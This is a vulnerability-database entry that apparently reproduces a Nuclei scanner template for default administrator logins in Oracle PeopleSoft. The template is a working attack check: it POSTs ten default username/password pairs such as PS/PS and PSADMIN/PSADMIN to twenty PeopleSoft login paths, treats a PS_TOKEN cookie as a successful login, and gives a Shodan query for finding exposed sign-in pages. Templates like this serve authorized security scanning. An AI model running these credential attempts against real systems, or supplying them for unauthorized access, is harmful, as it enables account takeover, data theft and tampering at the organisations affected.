漏洞描述
Oracle PeopleSoft contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
peoplesoft-default-login: Oracle PeopleSoft - Default Login
PoC代码[已公开]
id: peoplesoft-default-login
info:
name: Oracle PeopleSoft - Default Login
author: LogicalHunter
severity: high
description: Oracle PeopleSoft contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://www.oracle.com/applications/peoplesoft/
- https://erpscan.io/press-center/blog/peoplesoft-default-accounts/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 200
shodan-query: title:"Oracle PeopleSoft Sign-in"
product: peoplesoft_enterprise_peopletools
vendor: oracle
tags: default-login,peoplesoft,oracle,fuzz,vuln
http:
- method: POST
path:
- "{{BaseURL}}/psc/ps/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/csperf/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/FMPRD/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/csprd/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/hcmprdfp/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/HRPRODASP/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/guest/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/CSPRD_PUB/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/LHCGWPRD_1/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/CCHIPRD_2/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/applyuth/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/HRPRD/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/CAREERS/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/heprod_5/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/saprod/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/hr857prd_er/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/CHUMPRDM/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/HR92PRD/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/cangate_1/?&cmd=login&languageCd=ENG"
- "{{BaseURL}}/psp/ihprd/?&cmd=login&languageCd=ENG"
body: "timezoneOffset=360&ptmode=f&ptlangcd=ENG&ptinstalledlang=ENG&userid={{username}}&pwd={{password}}&ptlangsel=ENG"
headers:
Content-Type: application/x-www-form-urlencoded
attack: pitchfork
payloads:
username:
- PS
- VP1
- PSADMIN
- PSEM
- PSHC
- PSCR
- HFG
- PSPY
- HHR_JPM
- HHR_CMP
password:
- PS
- VP1
- PSADMIN
- PSEM
- PSHC
- PSCR
- HFG
- PSPY
- HHR_JPM
- HHR_CMP
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'Set-Cookie: PS_TOKEN='
- type: status
status:
- 302
# digest: 4a0a004730450220546317e66828cfc84d464d8dbb3cc7519005eb01a10e07246e00ab397de259b1022100caf35fcff072066b4b03123a9b423c7efcbd748e3f51454bf93aa039f40be516:922c64590222798bb761d5b6d8e72950